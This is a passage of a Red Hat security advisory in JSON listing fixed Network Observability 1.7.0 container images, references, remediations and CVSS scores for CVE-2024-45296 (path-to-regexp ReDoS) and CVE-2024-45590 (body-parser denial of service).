"title": "Vulnerability description"
},
{
"category": "summary",
"text": "path-to-regexp: Backtracking regular expressions cause ReDoS",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45296"
},
{
"category": "external",
"summary": "RHBZ#2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f",
"url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6",
"url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j",
"url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j"
}
],
"release_date": "2024-09-09T19:15:13.330000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
